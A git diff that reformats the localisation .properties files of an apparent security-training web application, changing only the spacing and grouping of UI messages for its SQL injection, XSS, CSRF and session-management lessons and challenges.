-setToken.sentTo.2=via email.
\ No newline at end of file
+response.welcome = Welcome
+response.resultKey = The result key is
+response.badPass = Incorrect password for
+response.badUser = User name not found.
+response.welcomeGuest = Welcome Guest
+response.guestMessage = No further information for Guest Users currently available. If your getting bored of the current functions available, you'll just have to upgrade yourself to an administrator somehow.
+
+form.userName = Username:
+form.password = Password:
+form.signIn = Sign In
+
+changePass.noDecode = Could not Decode Token
+changePass.badTokenData = Could not parse/manipulate date or time from token
+changePass.success = Password change request success.
+changePass.failure = Change Password Failed. Must be at least 12 characters.
+changePass.oldToken = Token is too old or none was submitted. Please get another one
+changePass.youngToken = Token is too young. Please get another and try again.
+changePass.funkyToken = Token is invalid (Too Funky). Please get another and try again.
+
+setToken.sentTo.1 = URL with embedded password reset token has been sent to
+setToken.sentTo.2 = via email.
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement6.properties b/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement6.properties
index 0ced95e81..880198e83 100644
--- a/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement6.properties
+++ b/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement6.properties
@@ -1,14 +1,16 @@
-response.welcome=Welcome
-response.resultKey=The result key is
-response.badPass=Incorrect password for
-response.badUser=User name not found.
-response.configError=500: INVALID ANSWER CONTROL CONFIGURATION SET
-form.userName=Username:
-form.password=Password:
-form.signIn=Sign In
-question.badAnswer=Incorrect Answer
-question.whoAreYou=Are you sure you are who you say you are?
-question.invalidAns=Invalid Answer
-question.invalidEmail=Invalid Email Address
-question.invalidData=Invalid Data Submitted
-question.noQuestion=No question found for that user
\ No newline at end of file
+response.welcome = Welcome
+response.resultKey = The result key is
+response.badPass = Incorrect password for
+response.badUser = User name not found.
+response.configError = 500: INVALID ANSWER CONTROL CONFIGURATION SET
+
+form.userName = Username:
+form.password = Password:
+form.signIn = Sign In
+
+question.badAnswer = Incorrect Answer
+question.whoAreYou = Are you sure you are who you say you are?
+question.invalidAns = Invalid Answer
+question.invalidEmail = Invalid Email Address
+question.invalidData = Invalid Data Submitted
+question.noQuestion = No question found for that user
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement7.properties b/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement7.properties
index 08cb290c1..c53d27574 100644
--- a/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement7.properties
+++ b/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement7.properties
@@ -1,13 +1,15 @@
-response.welcome=Welcome
-response.resultKey=The result key is
-response.badPass=Incorrect password for
-response.badUser=User name not found.
-response.configError=500: INVALID ANSWER CONTROL CONFIGURATION SET
-form.userName=Username:
-form.password=Password:
-form.signIn=Sign In
-question.badAnswer=Incorrect Answer
-question.whoAreYou=Are you sure you are who you say you are?
-question.invalidAns=Invalid Answer
-question.invalidEmail=Invalid Email Address
-question.invalidData=Invalid Data Submitted
\ No newline at end of file
+response.welcome = Welcome
+response.resultKey = The result key is
+response.badPass = Incorrect password for
+response.badUser = User name not found.
+response.configError = 500: INVALID ANSWER CONTROL CONFIGURATION SET
+
+form.userName = Username:
+form.password = Password:
+form.signIn = Sign In
+
+question.badAnswer = Incorrect Answer
+question.whoAreYou = Are you sure you are who you say you are?
+question.invalidAns = Invalid Answer
+question.invalidEmail = Invalid Email Address
+question.invalidData = Invalid Data Submitted
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement8.properties b/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement8.properties
index c3f8eb4f3..3682643dc 100644
--- a/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement8.properties
+++ b/src/main/resources/i18n/servlets/challenges/sessionManagement/sessionManagement8.properties
@@ -1,7 +1,7 @@
-response.superUserClub=Super User Only Club
-response.welcomeSuperUser=Welcome super user! Your result key is as follows
-response.invalidRole=Invalid Role Detected
-response.notPrivileged=You're not a privileged User!!!
-response.notPrivileged.message=Stay away from the privileged only section. The super aggressive dogs have been released.
-response.hackDetected=HACK DETECTED
-response.hackDetected.message=A possible attack has been detected. Functionality Stopped before any damage was done
\ No newline at end of file
+response.superUserClub = Super User Only Club
+response.welcomeSuperUser = Welcome super user! Your result key is as follows
+response.invalidRole = Invalid Role Detected
+response.notPrivileged = You're not a privileged User!!!
+response.notPrivileged.message = Stay away from the privileged only section. The super aggressive dogs have been released.
+response.hackDetected = HACK DETECTED
+response.hackDetected.message = A possible attack has been detected. Functionality Stopped before any damage was done
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/sqli/sqli1.properties b/src/main/resources/i18n/servlets/challenges/sqli/sqli1.properties
index 46599423c..95677a0fe 100644
--- a/src/main/resources/i18n/servlets/challenges/sqli/sqli1.properties
+++ b/src/main/resources/i18n/servlets/challenges/sqli/sqli1.properties
@@ -1,5 +1,5 @@
-response.searchResults=Search Results
-response.table.name=Name
-response.table.address=Address
-response.table.comment=Comment
-response.noResults=There were no results found in your search
+response.searchResults = Search Results
+response.table.name = Name
+response.table.address = Address
+response.table.comment = Comment
+response.noResults = There were no results found in your search
diff --git a/src/main/resources/i18n/servlets/challenges/sqli/sqli3.properties b/src/main/resources/i18n/servlets/challenges/sqli/sqli3.properties
index 17abf685d..a41688550 100644
--- a/src/main/resources/i18n/servlets/challenges/sqli/sqli3.properties
+++ b/src/main/resources/i18n/servlets/challenges/sqli/sqli3.properties
@@ -1,3 +1,3 @@
-response.searchResults=Search Results
-response.table.name=Name
-response.noResults=There were no results found in your search
\ No newline at end of file
+response.searchResults = Search Results
+response.table.name = Name
+response.noResults = There were no results found in your search
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/sqli/sqli4.properties b/src/main/resources/i18n/servlets/challenges/sqli/sqli4.properties
index 93962169e..b617f7cb2 100644
--- a/src/main/resources/i18n/servlets/challenges/sqli/sqli4.properties
+++ b/src/main/resources/i18n/servlets/challenges/sqli/sqli4.properties
@@ -1,5 +1,5 @@
-response.loginResults=Login Result
-response.signedInAs=Signed in as
-response.adminResultKey=As you are the admin, here is the result key:
-response.adminsFun=But admins have all the fun
-response.superSecure=You didn't log in. This site is super secure so hax won't work!
\ No newline at end of file
+response.loginResults = Login Result
+response.signedInAs = Signed in as
+response.adminResultKey = As you are the admin, here is the result key:
+response.adminsFun = But admins have all the fun
+response.superSecure = You didn't log in. This site is super secure so hax won't work!
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/sqli/sqli5.properties b/src/main/resources/i18n/servlets/challenges/sqli/sqli5.properties
index 69687059d..0d1f91c6e 100644
--- a/src/main/resources/i18n/servlets/challenges/sqli/sqli5.properties
+++ b/src/main/resources/i18n/servlets/challenges/sqli/sqli5.properties
@@ -1,11 +1,11 @@
-response.orderComplete=Order Complete
-response.orderComplete.p1=Your order has been made and has been sent to our magic shipping department that knows where you want this to be delivered via brain wave sniffing techniques.
-response.orderComplete.p2=Your order comes to a total of
-response.orangesFreeSolution=Oranges were free, Well Done -
-response.orderFailed=Order Failed - Please try again later
-response.invalidAmount=Order Failed - It's over 9000! There's no way that can be right.
-response.percent=%
-response.off=off
-response.items=items
-response.noCoupon=No Coupon Found
-response.checkFailed=Check Failed - Please try again later
\ No newline at end of file
+response.orderComplete = Order Complete
+response.orderComplete.p1 = Your order has been made and has been sent to our magic shipping department that knows where you want this to be delivered via brain wave sniffing techniques.
+response.orderComplete.p2 = Your order comes to a total of
+response.orangesFreeSolution = Oranges were free, Well Done -
+response.orderFailed = Order Failed - Please try again later
+response.invalidAmount = Order Failed - It's over 9000! There's no way that can be right.
+response.percent = %
+response.off = off
+response.items = items
+response.noCoupon = No Coupon Found
+response.checkFailed = Check Failed - Please try again later
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/sqli/sqli6.properties b/src/main/resources/i18n/servlets/challenges/sqli/sqli6.properties
index 07b43247c..02b33d747 100644
--- a/src/main/resources/i18n/servlets/challenges/sqli/sqli6.properties
+++ b/src/main/resources/i18n/servlets/challenges/sqli/sqli6.properties
@@ -1,5 +1,5 @@
-response.welcomeBack=Welcome back
-response.authNumber=Your authentication number is now
-response.incorrectCreds=Incorrect Pin Number
-response.carefulNow=Careful now!
-response.badRequest=Bad Request? Please be careful!
\ No newline at end of file
+response.welcomeBack = Welcome back
+response.authNumber = Your authentication number is now
+response.incorrectCreds = Incorrect Pin Number
+response.carefulNow = Careful now!
+response.badRequest = Bad Request? Please be careful!
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/sqli/sqli7.properties b/src/main/resources/i18n/servlets/challenges/sqli/sqli7.properties
index 80ab6ccf7..95c9355ac 100644
--- a/src/main/resources/i18n/servlets/challenges/sqli/sqli7.properties
+++ b/src/main/resources/i18n/servlets/challenges/sqli/sqli7.properties
@@ -1,6 +1,6 @@
-response.welcome=Welcome
-response.resultKey=The result key for this level is
-response.incorrectCreds=Incorrect Password / User name
-response.carefulNow=Careful now!
-response.badEmail=Bad Email address detected.
-response.badRequest=Bad Request? Please be careful!
\ No newline at end of file
+response.welcome = Welcome
+response.resultKey = The result key for this level is
+response.incorrectCreds = Incorrect Password / User name
+response.carefulNow = Careful now!
+response.badEmail = Bad Email address detected.
+response.badRequest = Bad Request? Please be careful!
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/sqli/sqliEmail.properties b/src/main/resources/i18n/servlets/challenges/sqli/sqliEmail.properties
index cc0f17a09..4f981c47b 100644
--- a/src/main/resources/i18n/servlets/challenges/sqli/sqliEmail.properties
+++ b/src/main/resources/i18n/servlets/challenges/sqli/sqliEmail.properties
@@ -1,7 +1,7 @@
-response.searchResults=Search Results
-response.table.name=Name
-response.table.address=Address
-response.table.comment=Comment
-response.noResults=There were no results found in your search
-response.searchError=Search Error
-response.invalidEmail=Invalid Email Address was submitted
\ No newline at end of file
+response.searchResults = Search Results
+response.table.name = Name
+response.table.address = Address
+response.table.comment = Comment
+response.noResults = There were no results found in your search
+response.searchError = Search Error
+response.invalidEmail = Invalid Email Address was submitted
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/sqli/sqliEscaping.properties b/src/main/resources/i18n/servlets/challenges/sqli/sqliEscaping.properties
index 2a4f8f50f..d0a0dd5c6 100644
--- a/src/main/resources/i18n/servlets/challenges/sqli/sqliEscaping.properties
+++ b/src/main/resources/i18n/servlets/challenges/sqli/sqliEscaping.properties
@@ -1,5 +1,5 @@
-response.searchResults=Search Results
-response.table.name=Name
-response.table.address=Address
-response.table.comment=Comment
-response.noResults=There were no results found in your search
\ No newline at end of file
+response.searchResults = Search Results
+response.table.name = Name
+response.table.address = Address
+response.table.comment = Comment
+response.noResults = There were no results found in your search
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/sqli/sqliStoreProcedure.properties b/src/main/resources/i18n/servlets/challenges/sqli/sqliStoreProcedure.properties
index 2a4f8f50f..d0a0dd5c6 100644
--- a/src/main/resources/i18n/servlets/challenges/sqli/sqliStoreProcedure.properties
+++ b/src/main/resources/i18n/servlets/challenges/sqli/sqliStoreProcedure.properties
@@ -1,5 +1,5 @@
-response.searchResults=Search Results
-response.table.name=Name
-response.table.address=Address
-response.table.comment=Comment
-response.noResults=There were no results found in your search
\ No newline at end of file
+response.searchResults = Search Results
+response.table.name = Name
+response.table.address = Address
+response.table.comment = Comment
+response.noResults = There were no results found in your search
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/urlAccess/urlAccess1.properties b/src/main/resources/i18n/servlets/challenges/urlAccess/urlAccess1.properties
index 7b2f9e6e6..bc05e3464 100644
--- a/src/main/resources/i18n/servlets/challenges/urlAccess/urlAccess1.properties
+++ b/src/main/resources/i18n/servlets/challenges/urlAccess/urlAccess1.properties
@@ -1,6 +1,6 @@
-response.status=Server Status
-response.status.message=The server status is normal. Nothing to see here. Move along.
-response.statusFail=Server Status Failure
-response.statusFail.message=Could not retrieve server status. Invalid userData.
-result.keyMessage.1=We have no idea what is wrong with the server. It just keeps saying "Result key is;
-result.keyMessage.2=What does that even mean?!
\ No newline at end of file
+response.status = Server Status
+response.status.message = The server status is normal. Nothing to see here. Move along.
+response.statusFail = Server Status Failure
+response.statusFail.message = Could not retrieve server status. Invalid userData.
+result.keyMessage.1 = We have no idea what is wrong with the server. It just keeps saying "Result key is;
+result.keyMessage.2 = What does that even mean?!
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/urlAccess/urlAccess2.properties b/src/main/resources/i18n/servlets/challenges/urlAccess/urlAccess2.properties
index dd1c22f88..035dcf2a2 100644
--- a/src/main/resources/i18n/servlets/challenges/urlAccess/urlAccess2.properties
+++ b/src/main/resources/i18n/servlets/challenges/urlAccess/urlAccess2.properties
@@ -1,9 +1,12 @@
-admin.clicked=Admin Button Clicked
-admin.keyMessage.1=Hey Admin, Here is that key you are looking for:
-admin.keyMessage.2=Enjoy!
-message.boring=Pretty Boring Stuff.
-message.different=This is different.
-request.normal=Normal Guest Request
-request.notNormal=Not Normal Guest Request
-response.failure=Server Status Failure
-response.failue.message=Could not retrieve server status. Invalid userData.
\ No newline at end of file
+admin.clicked = Admin Button Clicked
+admin.keyMessage.1 = Hey Admin, Here is that key you are looking for:
+admin.keyMessage.2 = Enjoy!
+
+message.boring = Pretty Boring Stuff.
+message.different = This is different.
+
+request.normal = Normal Guest Request
+request.notNormal = Not Normal Guest Request
+
+response.failure = Server Status Failure
+response.failue.message = Could not retrieve server status. Invalid userData.
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/urlAccess/urlAccess3.properties b/src/main/resources/i18n/servlets/challenges/urlAccess/urlAccess3.properties
index 1694c61ce..2f4f1e2d2 100644
--- a/src/main/resources/i18n/servlets/challenges/urlAccess/urlAccess3.properties
+++ b/src/main/resources/i18n/servlets/challenges/urlAccess/urlAccess3.properties
@@ -1,9 +1,10 @@
-admin.superAdminClub=Super User Only Club
-admin.superAdminClub.keyMessage=Welcome super admin! Your result key is as follows
-response.invalidUser=Invalid User Detected
-response.hackDetected=HACK DETECTED
-response.hackDetected.message=A possible attack has been detected. Functionality Stopped before any damage was done
-response.notSuperAdmin=You're not a Super Admin!!!
-response.notSuperAdmin.message=Stay away from the super admin only section. The mighty dog beasts have been released.
-response.whoAreYou=Who are you?
-response.whoAreYou.message=System could not process user identifier submitted. The admin list has been notified of the event
\ No newline at end of file
+admin.superAdminClub = Super User Only Club
+admin.superAdminClub.keyMessage = Welcome super admin! Your result key is as follows
+
+response.invalidUser = Invalid User Detected
+response.hackDetected = HACK DETECTED
+response.hackDetected.message = A possible attack has been detected. Functionality Stopped before any damage was done
+response.notSuperAdmin = You're not a Super Admin!!!
+response.notSuperAdmin.message = Stay away from the super admin only section. The mighty dog beasts have been released.
+response.whoAreYou = Who are you?
+response.whoAreYou.message = System could not process user identifier submitted. The admin list has been notified of the event
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/xss/xss1.properties b/src/main/resources/i18n/servlets/challenges/xss/xss1.properties
index 619425449..40a4ec581 100644
--- a/src/main/resources/i18n/servlets/challenges/xss/xss1.properties
+++ b/src/main/resources/i18n/servlets/challenges/xss/xss1.properties
@@ -1,5 +1,6 @@
-result.wellDone=Well Done
-result.youDidIt=You successfully executed the JavaScript alert command!
-result.resultKey=The result key for this challenge is
-response.searchResults=Search Results
-response.noResults=Sorry but there were no results found that related to
\ No newline at end of file
+result.wellDone = Well Done
+result.youDidIt = You successfully executed the JavaScript alert command!
+result.resultKey = The result key for this challenge is
+
+response.searchResults = Search Results
+response.noResults = Sorry but there were no results found that related to
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/xss/xss2.properties b/src/main/resources/i18n/servlets/challenges/xss/xss2.properties
index 619425449..40a4ec581 100644
--- a/src/main/resources/i18n/servlets/challenges/xss/xss2.properties
+++ b/src/main/resources/i18n/servlets/challenges/xss/xss2.properties
@@ -1,5 +1,6 @@
-result.wellDone=Well Done
-result.youDidIt=You successfully executed the JavaScript alert command!
-result.resultKey=The result key for this challenge is
-response.searchResults=Search Results
-response.noResults=Sorry but there were no results found that related to
\ No newline at end of file
+result.wellDone = Well Done
+result.youDidIt = You successfully executed the JavaScript alert command!
+result.resultKey = The result key for this challenge is
+
+response.searchResults = Search Results
+response.noResults = Sorry but there were no results found that related to
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/xss/xss3.properties b/src/main/resources/i18n/servlets/challenges/xss/xss3.properties
index 619425449..40a4ec581 100644
--- a/src/main/resources/i18n/servlets/challenges/xss/xss3.properties
+++ b/src/main/resources/i18n/servlets/challenges/xss/xss3.properties
@@ -1,5 +1,6 @@
-result.wellDone=Well Done
-result.youDidIt=You successfully executed the JavaScript alert command!
-result.resultKey=The result key for this challenge is
-response.searchResults=Search Results
-response.noResults=Sorry but there were no results found that related to
\ No newline at end of file
+result.wellDone = Well Done
+result.youDidIt = You successfully executed the JavaScript alert command!
+result.resultKey = The result key for this challenge is
+
+response.searchResults = Search Results
+response.noResults = Sorry but there were no results found that related to
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/xss/xss4.properties b/src/main/resources/i18n/servlets/challenges/xss/xss4.properties
index 8e8668b7d..012d31845 100644
--- a/src/main/resources/i18n/servlets/challenges/xss/xss4.properties
+++ b/src/main/resources/i18n/servlets/challenges/xss/xss4.properties
@@ -1,5 +1,6 @@
-result.wellDone=Well Done
-result.youDidIt=You successfully executed the JavaScript alert command!
-result.resultKey=The result key for this challenge is
-response.yourPost=Your New Post!
-response.linkPosted=You just posted the following link;
\ No newline at end of file
+result.wellDone = Well Done
+result.youDidIt = You successfully executed the JavaScript alert command!
+result.resultKey = The result key for this challenge is
+
+response.yourPost = Your New Post!
+response.linkPosted = You just posted the following link;
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/xss/xss5.properties b/src/main/resources/i18n/servlets/challenges/xss/xss5.properties
index 8e8668b7d..012d31845 100644
--- a/src/main/resources/i18n/servlets/challenges/xss/xss5.properties
+++ b/src/main/resources/i18n/servlets/challenges/xss/xss5.properties
@@ -1,5 +1,6 @@
-result.wellDone=Well Done
-result.youDidIt=You successfully executed the JavaScript alert command!
-result.resultKey=The result key for this challenge is
-response.yourPost=Your New Post!
-response.linkPosted=You just posted the following link;
\ No newline at end of file
+result.wellDone = Well Done
+result.youDidIt = You successfully executed the JavaScript alert command!
+result.resultKey = The result key for this challenge is
+
+response.yourPost = Your New Post!
+response.linkPosted = You just posted the following link;
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/xss/xss6.properties b/src/main/resources/i18n/servlets/challenges/xss/xss6.properties
index 8e8668b7d..012d31845 100644
--- a/src/main/resources/i18n/servlets/challenges/xss/xss6.properties
+++ b/src/main/resources/i18n/servlets/challenges/xss/xss6.properties
@@ -1,5 +1,6 @@
-result.wellDone=Well Done
-result.youDidIt=You successfully executed the JavaScript alert command!
-result.resultKey=The result key for this challenge is
-response.yourPost=Your New Post!
-response.linkPosted=You just posted the following link;
\ No newline at end of file
+result.wellDone = Well Done
+result.youDidIt = You successfully executed the JavaScript alert command!
+result.resultKey = The result key for this challenge is
+
+response.yourPost = Your New Post!
+response.linkPosted = You just posted the following link;
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/errors.properties b/src/main/resources/i18n/servlets/errors.properties
index 8ae887b30..1dd3a6b85 100644
--- a/src/main/resources/i18n/servlets/errors.properties
+++ b/src/main/resources/i18n/servlets/errors.properties
@@ -1,7 +1,7 @@
-error.funky=An Error Occurred! You must be getting funky!
-error.noSession=No session was detected with your request. Are you signed in?
-error.detected=An error was detected!
-error.shouldNotBeHere=You shouldn't be here!
-error.occured=Error Occurred:
-error.notOpen=The Level is not open. Please ask the admin to open it before trying to continue. This is not \
+error.funky = An Error Occurred! You must be getting funky!
+error.noSession = No session was detected with your request. Are you signed in?
+error.detected = An error was detected!
+error.shouldNotBeHere = You shouldn't be here!
+error.occured = Error Occurred:
+error.notOpen = The Level is not open. Please ask the admin to open it before trying to continue. This is not \
part of the game.
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/lessons/csrfLesson.properties b/src/main/resources/i18n/servlets/lessons/csrfLesson.properties
index 6f79dda85..5e69f13e8 100644
--- a/src/main/resources/i18n/servlets/lessons/csrfLesson.properties
+++ b/src/main/resources/i18n/servlets/lessons/csrfLesson.properties
@@ -1,8 +1,10 @@
-result.wellDone=Well Done
-result.youDidIt=
The administrator received your message and submitted the GET request embedded in it's image
-result.theKeyIs=The result key for this lesson is
-challenge.messageSent=Message Sent
-challenge.sentTo=Sent To
-challenge.message=Message
-target.success=User Marked as completed CSRF Lesson
-target.notAdmin=You must be an administrator to perform this function
\ No newline at end of file
+result.wellDone = Well Done
+result.youDidIt =
The administrator received your message and submitted the GET request embedded in it's image
+result.theKeyIs = The result key for this lesson is
+
+challenge.messageSent = Message Sent
+challenge.sentTo = Sent To
+challenge.message = Message
+
+target.success = User Marked as completed CSRF Lesson
+target.notAdmin = You must be an administrator to perform this function
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/lessons/directObject.properties b/src/main/resources/i18n/servlets/lessons/directObject.properties
index 167b2a66c..4fd82472f 100644
--- a/src/main/resources/i18n/servlets/lessons/directObject.properties
+++ b/src/main/resources/i18n/servlets/lessons/directObject.properties
@@ -1,9 +1,10 @@
-response.user=User
-response.age=Age
-response.address=Address
-response.email=Email
-response.message=Private Message
-response.noMessage=No Private Message Set
-response.notFound=404 - User Not Found
-response.couldNotFind=could not be found or does not exist
-result.resultKey=Result Key
\ No newline at end of file
+response.user = User
+response.age = Age
+response.address = Address
+response.email = Email
+response.message = Private Message
+response.noMessage = No Private Message Set
+response.notFound = 404 - User Not Found
+response.couldNotFind = could not be found or does not exist
+
+result.resultKey = Result Key
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/lessons/poorValidation.properties b/src/main/resources/i18n/servlets/lessons/poorValidation.properties
index be92d648f..208968788 100644
--- a/src/main/resources/i18n/servlets/lessons/poorValidation.properties
+++ b/src/main/resources/i18n/servlets/lessons/poorValidation.properties
@@ -1,6 +1,7 @@
-result.validationBypassed=Validation Bypassed
-result.youDidIt=You defeated the lesson validation
-result.resultKey=Result Key
-response.validNumber=Valid Number Submitted
-response.theNumber=The Number
-response.valid=is a valid number
\ No newline at end of file
+result.validationBypassed = Validation Bypassed
+result.youDidIt = You defeated the lesson validation
+result.resultKey = Result Key
+
+response.validNumber = Valid Number Submitted
+response.theNumber = The Number
+response.valid = is a valid number
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/lessons/securityMisconfig.properties b/src/main/resources/i18n/servlets/lessons/securityMisconfig.properties
index 8ec00f31e..9b03717d6 100644
--- a/src/main/resources/i18n/servlets/lessons/securityMisconfig.properties
+++ b/src/main/resources/i18n/servlets/lessons/securityMisconfig.properties
@@ -1,7 +1,8 @@
-result.lessonComplete=Lesson Complete
-result.youDidIt=You have successfully signed in with the default sign in details for this applicaiton. You should always change default passwords and avoid default administration usernames.
-result.key=Result Key
-response.authError=Authentication Error
-response.authSuccess=Authentication Successful
-response.incorrectPassword=Incorrect Password Submitted
-response.noUserFound=No user records found for
\ No newline at end of file
+result.lessonComplete = Lesson Complete
+result.youDidIt = You have successfully signed in with the default sign in details for this applicaiton. You should always change default passwords and avoid default administration usernames.
+result.key = Result Key
+
+response.authError = Authentication Error
+response.authSuccess = Authentication Successful
+response.incorrectPassword = Incorrect Password Submitted
+response.noUserFound = No user records found for
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/lessons/sessionManagement.properties b/src/main/resources/i18n/servlets/lessons/sessionManagement.properties
index 1267911e8..6dc1ef865 100644
--- a/src/main/resources/i18n/servlets/lessons/sessionManagement.properties
+++ b/src/main/resources/i18n/servlets/lessons/sessionManagement.properties
@@ -1,4 +1,5 @@
-result.lessonComplete=Lesson Complete
-result.youDidIt=Congratulations, you have bypassed this lessons VERY WEAK session management. The result key for this lesson is
-response.lessonNotComplete=Lesson Not Complete
-response.youDidntDoIt=You have not completed this lesson yet.
\ No newline at end of file
+result.lessonComplete = Lesson Complete
+result.youDidIt = Congratulations, you have bypassed this lessons VERY WEAK session management. The result key for this lesson is
+
+response.lessonNotComplete = Lesson Not Complete
+response.youDidntDoIt = You have not completed this lesson yet.
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/lessons/sqlInjection.properties b/src/main/resources/i18n/servlets/lessons/sqlInjection.properties
index a19eb8e56..a33615feb 100644
--- a/src/main/resources/i18n/servlets/lessons/sqlInjection.properties
+++ b/src/main/resources/i18n/servlets/lessons/sqlInjection.properties
@@ -1,5 +1,5 @@
-response.searchResults=Search Results
-response.noResults=No rows returned from that query! Make sure your escaping the string and changing the boolean result of the WHERE to be always true
-response.userId=User Id
-response.userName=User Name
-response.comment=Comment
\ No newline at end of file
+response.searchResults = Search Results
+response.noResults = No rows returned from that query! Make sure your escaping the string and changing the boolean result of the WHERE to be always true
+response.userId = User Id
+response.userName = User Name
+response.comment = Comment
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/lessons/unvalidatedRedirect.properties b/src/main/resources/i18n/servlets/lessons/unvalidatedRedirect.properties
index 3a117baee..b5eae99c8 100644
--- a/src/main/resources/i18n/servlets/lessons/unvalidatedRedirect.properties
+++ b/src/main/resources/i18n/servlets/lessons/unvalidatedRedirect.properties
@@ -1,10 +1,12 @@
-result.wellDone=Well Done
-result.youDidIt=The administrator received your message, clicked the link, and submitted the GET request automatically through the invalidated redirect
-result.resultKey=The result key for this lesson is
-response.messageSent=Message Sent
-response.sentTo=Sent To
-response.message=Message
-response.linkFrom=Link from
-target.example=Hardened Vulnerable Redirect example
-target.completed=User Marked as completed Redirect Lesson
-target.notAdmin=You must be an administrator to perform this function
\ No newline at end of file
+result.wellDone = Well Done
+result.youDidIt = The administrator received your message, clicked the link, and submitted the GET request automatically through the invalidated redirect
+result.resultKey = The result key for this lesson is
+
+response.messageSent = Message Sent
+response.sentTo = Sent To
+response.message = Message
+response.linkFrom = Link from
+
+target.example = Hardened Vulnerable Redirect example
+target.completed = User Marked as completed Redirect Lesson
+target.notAdmin = You must be an administrator to perform this function
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/lessons/xss.properties b/src/main/resources/i18n/servlets/lessons/xss.properties
index 083f72da8..5a3936ff1 100644
--- a/src/main/resources/i18n/servlets/lessons/xss.properties
+++ b/src/main/resources/i18n/servlets/lessons/xss.properties
@@ -1,5 +1,6 @@
-result.wellDone=Well Done
-result.youDidIt=You successfully executed the JavaScript alert command!
-result.resultKey=The result key for this lesson is
-response.searchResults=Search Results
-response.noResults=Sorry but there were no results found that related to
\ No newline at end of file
+result.wellDone = Well Done
+result.youDidIt = You successfully executed the JavaScript alert command!
+result.resultKey = The result key for this lesson is
+
+response.searchResults = Search Results
+response.noResults = Sorry but there were no results found that related to
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/lessons/xxe.properties b/src/main/resources/i18n/servlets/lessons/xxe.properties
index 6bc95c945..9a512bea0 100644
--- a/src/main/resources/i18n/servlets/lessons/xxe.properties
+++ b/src/main/resources/i18n/servlets/lessons/xxe.properties
@@ -1,3 +1,3 @@
-response.invalid.email=Invalid email address
-response.blank.email=Email must not be blank
-response.success.reset=The password has been reset for
\ No newline at end of file
+response.invalid.email = Invalid email address
+response.blank.email = Email must not be blank
+response.success.reset = The password has been reset for
\ No newline at end of file
diff --git a/src/main/resources/i18n/text.properties b/src/main/resources/i18n/text.properties
index c1abe191e..c7993ee31 100644
--- a/src/main/resources/i18n/text.properties
+++ b/src/main/resources/i18n/text.properties
@@ -1,138 +1,146 @@
-generic.text.aboutSecShep=About Security Shepherd
-generic.text.admin=Admin
-generic.text.cheat=Cheat
-generic.text.challenges=Challenges
-generic.text.assignments=Assignments
-generic.text.commentMessage.1=You are currently looking at the core server.
-generic.text.commentMessage.2=Nothing related to the levels in Security Shepherd will be found in here.
-generic.text.commentMessage.3=You might be looking for the iframe embedded in the page.
-generic.text.commentMessage.4=Try a tool like Firebug to make this stuff easier.
-generic.text.configuration=Configuration
-generic.text.configureShepherd=Configure Shepherd
-generic.text.confirmPasswd=Confirm Password
-generic.text.confirmEmailAddr=Confirm Email
-generic.text.emailAddr=Email Address
-generic.text.lessons=Lessons
-generic.text.login=Login
-generic.text.logout=Logout
-generic.text.loading=Loading...
-generic.text.ssRegister=OWASP Security Shepherd - Register
-generic.text.password=Password
-generic.text.pleaseWait=Please Wait!
-generic.text.register=Register
-generic.text.scoreboard=Scoreboard
-generic.text.searchModules=Search Modules
-generic.text.shepherdVersion=Security Shepherd Version: 3.0
-generic.text.sorryError=Sorry but there was an error
-generic.text.submitResult=Submit Result Key Here
-generic.text.submit=Submit
-generic.text.username=Username
-generic.text.welcome=Welcome
-generic.text.copy.to.clip=Copy to clipboard
-generic.text.setup.title=No Database Configuration
-generic.text.setup.description=Security Shepherd has not detected a database configuration file. Use this form to configure your database server.
-generic.text.setup.enable.mongodb=Enable NoSQL Challenge
-generic.text.setup.enable.unsafe=Enable Unsafe Challenges
-generic.text.setup.enable.unsafe.warn=[WARNING] Your host will be vulnerable with this enabled
-generic.text.setup.form.title=Set Database Properties
-generic.text.setup.token.title=Configuration Authentication Token
-generic.text.setup.token.description=To use this function you must collect an authentication token from the server's file system. Collect it from this path;
-generic.text.setup.host=Hostname
-generic.text.setup.port=Port
-generic.text.setup.user=DB Username
-generic.text.setup.pwd=DB Password
-generic.text.setup.wipe=Fresh Database
-generic.text.setup.dontwipe=Do not override
